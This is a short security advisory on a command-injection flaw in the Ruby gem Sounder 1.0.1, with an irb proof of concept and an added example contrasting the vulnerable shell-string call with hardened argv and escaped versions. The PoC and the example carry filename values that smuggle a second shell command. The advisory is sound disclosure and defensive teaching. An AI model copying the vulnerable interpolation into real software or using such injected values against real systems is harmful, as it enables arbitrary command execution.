Command Injection in Ruby Gem Sounder 1.0.1
8/10/2013
Larry W. Cashdollar
@_larry0

https://rubygems.org/gems/sounder

Sounder is a Ruby gem that provides an API for Mac OS X's afplay command.

From lib/sounder/sound.rb (the value of @file is interpolated, unescaped, into a command string that system passes to /bin/sh, so shell metacharacters in the filename are executed as shell syntax):

def play
  system %{/usr/bin/afplay "#{@file}" &}
end

PoC:

irb(main):098:0> @file = "\"id;/usr/bin/id>/tmp/p;\""
=> "\"id;/usr/bin/id>/tmp/p;\""
irb(main):099:0>  system %{/bin/echo "#{@file}" }
id
sh: 1: : Permission denied
=> false
irb(main):100:0> 

larry@underfl0w:/tmp$ cat /tmp/p
uid=1000(larry) gid=600(staff) groups=600(user)
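
Added example (my code, not from the Sounder gem): the vulnerable string form of the call next to two hardened variants, the argv form of Process.spawn, which never invokes a shell, and Shellwords.escape for the case where a shell string cannot be avoided. The function names and the sample filename are constructed for the illustration.

```ruby
require 'shellwords'

# Vulnerable pattern (mirrors lib/sounder/sound.rb): the filename is
# interpolated into one string that Kernel#system hands to /bin/sh, so
# quotes, ';', '$(...)' and backticks in the filename are parsed as shell
# syntax. Returned rather than executed here so it can be inspected.
def vulnerable_command(file)
  %{/usr/bin/afplay "#{file}" &}
end

# Hardened 1: the multi-argument form of Process.spawn/Kernel#system goes
# straight to execve(2) with no shell, so the filename is a single argv
# element no matter what characters it contains. The trailing "&" of the
# original is replaced by spawn + Process.detach for backgrounding.
def safe_argv(file)
  ["/usr/bin/afplay", file.to_s]
end

def play_safely(file)
  pid = Process.spawn(*safe_argv(file))
  Process.detach(pid)
  pid
end

# Hardened 2: if a shell string is genuinely required (e.g. for "&"),
# Shellwords.escape backslash-escapes every shell metacharacter first.
def shell_escaped_command(file)
  "/usr/bin/afplay #{Shellwords.escape(file.to_s)} &"
end

if __FILE__ == $PROGRAM_NAME
  # Constructed hostile filename, same shape as the advisory's PoC value.
  hostile = %q{"; /usr/bin/id > /tmp/p; "}
  puts "string form:  #{vulnerable_command(hostile)}"
  p   safe_argv(hostile)
  puts "escaped form: #{shell_escaped_command(hostile)}"
end
```

play_safely is the drop-in replacement for the gem's play method; the other two functions only build the command so the difference is visible without running afplay.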

Author Notified: 8/9/2013